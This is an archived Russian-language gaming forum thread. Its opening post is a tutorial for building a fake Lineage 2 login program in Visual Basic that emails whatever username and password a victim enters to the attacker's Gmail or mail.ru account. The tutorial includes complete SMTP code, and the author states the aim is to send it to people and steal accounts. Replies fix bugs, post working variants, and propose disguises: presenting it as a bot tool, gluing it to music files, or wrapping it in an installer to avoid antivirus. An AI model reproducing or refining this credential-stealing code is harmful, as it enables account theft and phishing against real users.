PDA

Просмотр полной версии : [Lineage2-паблик] Как сделать программу для кражи аккаунтов l2(Visual Basic)


BlackWinG
10.07.2010, 01:56
Привет всем! Это краткий гайд как с помощью Visual Basic сделать программу для кражи аккаунтов

Вопрос: Что дает данная программа?

Ответ: Вы посылаете ее жертве, и когда она ввела в поле свои данные от аккаунта - они вам присылаються на Email

Не забываем:
1. Вы должны иметь аккаунт на gmail.com
2. Это не кейлогер, а программа для отправки данных на Email


1) Для начала вам нужен Visual Basic. Чтобы скачать ее, перейдите по ссылке ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Как только вы установили ее, откройте и нажмите Ctrl+N, чтобы создать новый проект и выберите Windows form Applications, нажмите ОК

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

2) Нам нужны 2 кнопки, 2 ярлыка и 2 поля ввода текста

Выберите 3 данных опции и перетащите их в окно программы:

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

3) Далее откоректируйте размер каждого ярлыка, кнопки и строки - у вас должно получиться примерно так

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

4) Теперь нам нужно изменить название кнопок и ярлыков

Ярлык №1 - "ID"
Ярлык №2 - "Password"

Кнопка №1 - "Log In"
Кнопка №2 - "EXIT"

Примечание: Кнопка "EXIT" имеет такую же функцию отправки данных как и "Log In"

Чтобы изменить имя, мы нажимаем 1 раз на ярлык, и открываеться окно настроек, в котором редактируем название

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Изменям название соответсвенно для всех кнопок и ярлыков. Должно выйти как-то так:

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

5) Теперь чтобы наше окно выглядело красивее, мы прикрепляем картинку

Чтобы добавить картинку, на панеле выберите [Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Далее мы выбираем место, где будет находиться картинка:

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

После того как мы загрузили картинку, к примеру

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

и идем в настройки, выбираем изображение и нажимаем "import".

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Далее появиться такое окно:

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Выбираем local resource, далее импортируем, выбираем нашу картинку и нажимаем ОК.

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Теперь нам нужен код для работы нашей программы
Нажимаем дважды на логе программы, и окно будет иногда выглядеть так

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Теперь, в это окно мы копируем данный код


If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
Else
End If
End if
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Ваш Gmail", "Ваш Gmail Пароль")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
smtpServer.Send(mail)
MsgBox("Disconnected From Server, Please try again later!")


Вы должны вписать ваш логин и пароль от Gmail
Также вы должны оставить " dont delete them"

Вы можете изменить сообщение "ОК" на ваше

Примечание: Я не знаю почему, но этот просто код выдает ошибку

Решение:

1. Нажмите кнопку оранжевого знака восклицания, которая находиться под словом "SmtpClient"

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

2. Далее выберите "Import.System.Net.Mail"

Также проделайте данное действие для "MailAddress"

7) Все почти готово
ИЗмените слой: Перейдите в "Form1.vb" [Design] и нажмите кнопку "start debugging"

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Если вы все правильно сделали, ваша программа жива теперь ):

Вы можете проверить ее, вписав "левый" логин и пароль. Если данные пришли на Gmail, значит программа работает на УРА

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Вот и все:)

8) Теперь сохраните программу, нажав Control + Shift + S
Далее откройте папку с программой. Вы увидите другой файл с названием вашей программы. Откройте его - появиться множество файлов

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Выберите папку "obj", затем "debug" и вы увидите вашу программу

[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

Теперь вы можете отсылать ее людям и начинать воровать аккаунты :)

Конец :)

Перевод сделал BlackWinG, Наслаждайтесь :)

Phenomenon O.o
11.08.2010, 19:21
:)
ща попробую сделать))

Добавлено через 1 час 11 минут
проблемка :( не вижу "
2) Нам нужны 2 кнопки, 2 ярлыка и 2 поля ввода текста

Выберите 3 данных опции и перетащите их в окно программы:" где это ? :(

micralab
12.08.2010, 18:09
:)
ща попробую сделать))

Добавлено через 1 час 11 минут
проблемка :( не вижу "
2) Нам нужны 2 кнопки, 2 ярлыка и 2 поля ввода текста

Выберите 3 данных опции и перетащите их в окно программы:" где это ? :(



Думаю наглдно ответил!)

~Denis~
12.08.2010, 19:45
хм, думаю будет очень весело , если при в воде zhyk zhyk выводил окно с настройками(лог и пасс от мыла(для тех, кто с языком на ВЫ) и смена админ ника(zhyk zhyk)

micralab
12.08.2010, 22:19
Автор я не хочу обижать ну думаю надо было указать что тут требуеться 2 мыла 1 с которого будет преходить 2 на который!
1. То с какова указываеться здесь:

smtpServer.Credentials = New Net.NetworkCredential("Ваш Gmail", "Ваш Gmail Пароль")
'using gmail

2. то на кокой будет приходить здесь:

mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")

Я ведь прав?)

Звезда в шоке
13.08.2010, 14:09
А почта и пароль от неё чтобы туда приходили взламаные пароли ?как зделать чтобы в Icq шли?

Newb1e
13.08.2010, 17:12
Все сделал как написано, но столкнулся с проблемой, когда я захожу в програмку, чтобы ее проверить, и пишу любой логин и пароль, после проверки почты не приходит самого логина, приходит только письмо вида "Username : , Password :", но пароля и логина как видите нету =( в чем же беда ??(((

micralab
13.08.2010, 20:55
А почта и пароль от неё чтобы туда приходили взламаные пароли ?как зделать чтобы в Icq шли?

Нет что бы с нее приходили на указанный МАИЛ! Что бы приходило на icq надо переписывать исходник этот только под МЫЛО!


Newb1e Попробуй переделать прогу возможно ты чето перепутал! А "Username : , Password :" Это и должно приходить только после "Username : должен стоять Log In а после Password : Password"

~Denis~
13.08.2010, 21:57
а как на счет моего предложения?

miledi
13.08.2010, 23:58
Кто подскажет как переписать исходник под аську ?

micralab
14.08.2010, 02:35
~Denis~ Возможно но так же придеться переписывать исходник и даже увевичивать его в размерах!

miledi Ну это ищи людей Возможно Автор поможет! :)

~Denis~
14.08.2010, 09:15
хм, если б кто то для делфей написал такое..
я бы помог с менюшкой этой))

relex22rus
14.08.2010, 09:17
а как сделать под клиент? что бы в форме было lineage2 и картинку вставить?
и меню как у монка. что бы прописал слово и вылезло скрытое меню?

micralab
14.08.2010, 14:38
relex22rus Читай внимательнее уже было сказанно!

Newb1e
14.08.2010, 17:39
micralab, пожалуйста стукни мне в аську 354444646 или скайп svname ! Я уже долго морочился по этому вопросу, и я думаю что все таки что то тут именно с кодом ! стукни мне обсудим, а у тебя все нормально вышло ? напиши в аську или скайп

Insane*
15.08.2010, 11:25
Помогите кто знает в чем проблема(Команда не реализована. Ответ сервера: 5.5.1 Unrecognized command.) Вот такое выскакивает кагда я жму кнопку Log In

GiV
16.09.2010, 16:41
Помогите не могу понять что к чему исправте Пж=(


Imports System.Net.Mail
Imports System.Net.WebRequestMethods


Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "dont delete them" Then
MsgBox("Username Is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Mising")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("[Ссылки могут видеть только зарегистрированные и активированные пользователи]", "*********")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("[Ссылки могут видеть только зарегистрированные и активированные пользователи]")
mail.To.Add("malinovskiygmail.ru")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(http)://sateda.tsf-team.com)
MsgBox("Disconnected From Server, Please try again later!")
End Sub
End Class

object
16.09.2010, 17:08
Парим здесь. ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) Самый легкий фейк

fuzzion
16.09.2010, 18:42
If TextBox1.Text = "dont delete them" Then

если ты "типо" писал это на сишарпе, то там совсем не такая структура условного оператора.

taste
07.11.2010, 08:34
Зря вы выкладываете такое эти нубы от жадности с ума сходят.И на фейки ток самые глупые бараны попадутся.

cjfor11
08.11.2010, 02:51
что-то не хочет он отправлять мне на мыло не чего .
Компилируеться и запускаеться, но после нажатия кнопки "log In" тупо виснит .

OneShot
09.11.2010, 05:19
Можно и по красивее что нибудь написать =) У меня задумка была вообще сделать точь в точь окно логина линейдж. Но пока тяжеловато осуществить

On1yFan
21.11.2010, 20:34
да через бэйсик можно много нарисовать фейков как и сайты фейковый и не париться) но проблема найти нуба который по ведеться

Wenerol
27.11.2010, 04:27
Кто подскажет как переписать исходник под аську ?

Думаю с помощью VB не сделаешь отправку пассов и логинов в асю, тут другая программа нужна. А так щас на программки типо таких мало кто ведется. Можно для реалистичности прогу запаковать в установщик, будет круче выглядить):agreed:

ymhu4ka
27.11.2010, 05:19
Все сделал как написано, но столкнулся с проблемой, когда я захожу в програмку, чтобы ее проверить, и пишу любой логин и пароль, после проверки почты не приходит самого логина, приходит только письмо вида "Username : , Password :", но пароля и логина как видите нету =( в чем же беда ??(((

всё верно... на мыло приходит только вот это "Username : , Password :",

сам лог и парроль не приходит... изза ошибки в коде...
кто может исправить?

uporovya
29.11.2010, 09:14
Супер! Здоровская вещь.

Лично я по аналогии быстренько доделал программу...сделал еще один текстбокс, куда нубы будут вписывать вебсайт сервера :D

+ сделал хелп в проге, оставил фейковские реквизиты
и выдавать буду скорей всего как новейшее АЦП или еще что-то)

Если кому-то что-то непонятно, пишите пм)

SanD
29.11.2010, 19:50
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Mising")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("[Ссылки могут видеть только зарегистрированные и активированные пользователи]", "mur1")
'using gmail
smtpServer.Port = 2525
smtpServer.Host = "smtp.mail.ru"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("[Ссылки могут видеть только зарегистрированные и активированные пользователи]")
mail.To.Add("[Ссылки могут видеть только зарегистрированные и активированные пользователи]")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Disconnected From Server, Please try again later!")
End Sub

Помогите, сделал всё как написано, сперва было как впримере gmail
но писало ошибку

A first chance exception of type 'System.Net.Mail.SmtpException' occurred in System.dll

Ошибка отправки сообщения

Поставил на mail . тоже самое

Пожалуйста помогите понять в чём проблема

Заранее спасибо! :pandal:

ub3R
01.12.2010, 22:09
идея хорошая,с помощью клейки мона склеить этот файл с любыми прогами,только трабла в том что антивирус может спалить как пинч.
PS а ваще антивирус этот файл палит?? \\\нет

Inako
02.12.2010, 14:34
Смотря какой антивирь... Оно может и не опознать его как "пинч" но если использовать KIS то выскочит запрос на разрешения передачи данных.. Это же сразу выведет на подозрения что данные пойдут не туда куда нужно было... Кста для большей реалстичности действительно нужно добавить хоть какую то связь с сервером, т.е. там адрес и т.д.
Вот интересует вопрос, почему только на gmail идет поддержка?

ub3R
02.12.2010, 15:12
значит если сам этот файл не палит то ваще зашибись) можно склеить хоть с муз.треком каким нить и кидать народу по аське)

enot221
02.12.2010, 18:00
Лучше кидать как Бота, или типо ЛК ) ну кому как в принципе.

Варлорд
09.01.2011, 01:27
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Mising")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("[Ссылки могут видеть только зарегистрированные и активированные пользователи]", "mur1")
'using gmail
smtpServer.Port = 2525
smtpServer.Host = "smtp.mail.ru"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("[Ссылки могут видеть только зарегистрированные и активированные пользователи]")
mail.To.Add("[Ссылки могут видеть только зарегистрированные и активированные пользователи]")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Disconnected From Server, Please try again later!")
End Sub

Помогите, сделал всё как написано, сперва было как впримере gmail
но писало ошибку

A first chance exception of type 'System.Net.Mail.SmtpException' occurred in System.dll

Ошибка отправки сообщения

Поставил на mail . тоже самое

Пожалуйста помогите понять в чём проблема

Заранее спасибо! :pandal:

Таже проблема.. Ищю решение пока что. Если кто наидет, отпишитесь

Добавлено через 10 часов 20 минут
Если у кого ошибка возникает описанная выше.Решение нашел: у вас название компьютера с русскими символами. Заходим в своиства и переименовываем имя компьютера англ символами.. Сеичас пытаюсь доработать программу, т.к на вин 7 у многих с русскими символами, нужно написать что то другое, а то прога будет не актуальна.

BuT9H
10.01.2011, 15:47
можно сделать чтобы при вводе zhyk : zhyk показывало меню

но тогда надо сделать еще одну форму и условие if
если у кого есть готовая уже кидайте попробую переделать если получится сюда выложу

Варлорд
10.01.2011, 17:02
можно сделать чтобы при вводе zhyk : zhyk показывало меню

но тогда надо сделать еще одну форму и условие if
если у кого есть готовая уже кидайте попробую переделать если получится сюда выложу

Ты хочешь сделать типа при вводе логина и пароля продолжение?

Я сеичас сделал типа АЦП прогу . Вводишь адрес серва, логин и пароль. Нажимаешь пуск. Выводит вторую форму на которой менюшки выбора клавишь для автоклика и выбор с какого показателя НР и CP начинать автоклик)) все это конечно же не работает. Еще хочу добавить загрузочное окно, типа при нажатии кнопки пуск будет вылазить окно с надписью : идет сканирование портов сервера и т.д.


Кстати насчет аськи... Реализуемо, но условие одно: аська должна быть включена и работать на компьютере жертвы.поэтому с почтой легче.. остается проблему решить к русским именем компьютера.

Если кому нужен вызов второй формы то: Создаем вторую форму, заходим в первую форму и там в тот код что опубликован дописываем
form2.show ()
При клике будет выводится вторая форма. Во второй же форме можно добавить Form1.Visible = False чтобы первую скрыть.
Вообще можно ведь поменять фон, не белый сделать а от линеики, с окном входа и т.д.. Одним словом доработать прогу надо, а то в таком виде палевная очень.

berserk2
02.02.2011, 22:15
smtpServer.Credentials = New Net.NetworkCredential("Ваш Gmail", "Ваш Gmail Пароль")
Автор, объясни мне для чего в этом коде вводить логин и пасс от своего почтового ящика?!?

GREIDER17
03.02.2011, 10:56
Автор, объясни мне для чего в этом коде вводить логин и пасс от своего почтового ящика?!?

как я понял там надо ввести лог и пас от ящека зарегестриравоново для бот рассылки чтобы тебе на мыло приходили украденые аки и пасы

crab12345
03.02.2011, 15:06
У меня возникла проблема выдает сообщение Заголовок сообщения"SmtpException" пишет такое"Сбой при отправке сообщения электронной почты" Прошу помочь найти ошибку в этом КОДЕ

прилагаю скрин и тхт файл с кодом

зарание спасибо

Keku
07.02.2011, 04:11
ну так кто то разобрался с проблемой то?

Добавлено через 5 минут
У меня возникла проблема выдает сообщение Заголовок сообщения"SmtpException" пишет такое"Сбой при отправке сообщения электронной почты" Прошу помочь найти ошибку в этом КОДЕ

прилагаю скрин и тхт файл с кодом

зарание спасибо

такая же проблема!

crab12345
12.02.2011, 19:51
блин ну помогите уже 9 дней жду ответа мой пост выше плизззззззззззз:(

TheFostres
18.02.2011, 19:35
Народ кто умеет зделайте через ICQ тогда будет вообще всё супер!

Sykin
30.03.2011, 21:38
Эта прога получится на подобие фигни, как на ла2ворлд помню буйствовала. Ее тупо открывали и все логины, пароли, мейлы и так далее улетали! Это она?

Максим142
31.03.2011, 21:52
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
я не могу понять я вот у себя проверяю у меня все работает программка и на почту все приходит а как тока кому то скину так сразу у того типа выходит ошибка и не чё не отправляется посмотрите я картинку дал и помогите пожалуйста

Добавлено через 2 часа 7 минут
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
вот я сделал программку эту у меня все работает и на почту все приходит а когда скидываю кому то то у того человека не работает ошибку выдает в сому программку у него то заходит он данные заполняет нажимает чтоб отправить и ошибка.... я вон кину картинку посмотрите помогите пожалуйста!!!!!

6x5Z8v71
04.04.2011, 18:14
Ничего не работает!!!! Совсем! Всё не правильно! Ты ламер!

Максим142
04.04.2011, 23:07
народ помогите разобраться я все делал согласно инструкции в начале!!

Добавлено через 26 минут
народ помогите разобраться я все делал согласно инструкции в начале!!

HappyBoy
07.04.2011, 20:01
смысл этой проги??? я что то не пойму...... кей логер надежнее на мой взгляд!!!

Mayword
23.04.2011, 14:25
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
я не могу понять я вот у себя проверяю у меня все работает программка и на почту все приходит а как тока кому то скину так сразу у того типа выходит ошибка и не чё не отправляется посмотрите я картинку дал и помогите пожалуйста

Добавлено через 2 часа 7 минут
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
вот я сделал программку эту у меня все работает и на почту все приходит а когда скидываю кому то то у того человека не работает ошибку выдает в сому программку у него то заходит он данные заполняет нажимает чтоб отправить и ошибка.... я вон кину картинку посмотрите помогите пожалуйста!!!!!



У всех у кого подобная ошибка нужно сделать такую вешь


If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
Else
End If
End if
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Ваш Gmail", "Ваш Gmail Пароль")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("ВАШЬ Е-МЕИЛ УКАЗАННЫЙ ВЫШЕ")
mail.To.Add("ВАШЬ Е-МЕИЛ УКАЗАННЫЙ ВЫШЕ")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
smtpServer.Send(mail)
MsgBox("Disconnected From Server, Please try again later!")

Treals
27.05.2011, 02:42
Все работает... Просто руки прямые надо иметь... Код полностью рабочий тока надо подправить кое что в начале
сделанно под mail.ru написан был в VS 2010
If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Mising")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Мыло, "Пароль")
smtpServer.Port = 587
smtpServer.Host = "smtp.mail.ru"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Ваше мыло")
mail.To.Add("Ваше мыло")
mail.Subject = "Тема сообщения"
mail.Body = "Логин : " & TextBox1.Text & ", " & "Пароль : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("Сообщение которое выскакивает")

KapaTe
09.06.2011, 22:14
Мда все в паряде. Но все же угнетает тупость некоторых юзеров.... Фишку с логин и паролем zhyk уже каждое ШКОЛОЛО знает и не к чему ето, так что уже не актуально + Напишите вам под асю БЛЕ@Ть люди ! Научитесь юзать google Да и не так трудно подучить хатябы в этом напровлении VBs. Ленивые нынче люди пошли все падаи им на блюдечке с голубой каемочкой. Лично я не учил нехфига собирал в блокноте первые скрипты из кусочков тово что я нашел в поиске. Попробуите может и у вас мозг не сухарь ;) Автору зачет :)

Поглядите мою "примитивную версию" мб каму понравится.
(З.Ы. Ето екзешник сотрите .rar) :hd:

Mayword
17.06.2011, 21:16
Попробуй прописать одинаковые мейлы,


smtpServer.Credentials = New Net.NetworkCredential("Ваш Gmail", "Ваш Gmail Пароль")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")

Justifity
23.08.2011, 11:50
А если на сервере при входе не "ID" и "Password", "Login in" и "Exit", а другое?
Нужно все равно оставить как в примере, или как при входе?
Извините если не увидел

enot221
24.08.2011, 03:17
тема 2010 года...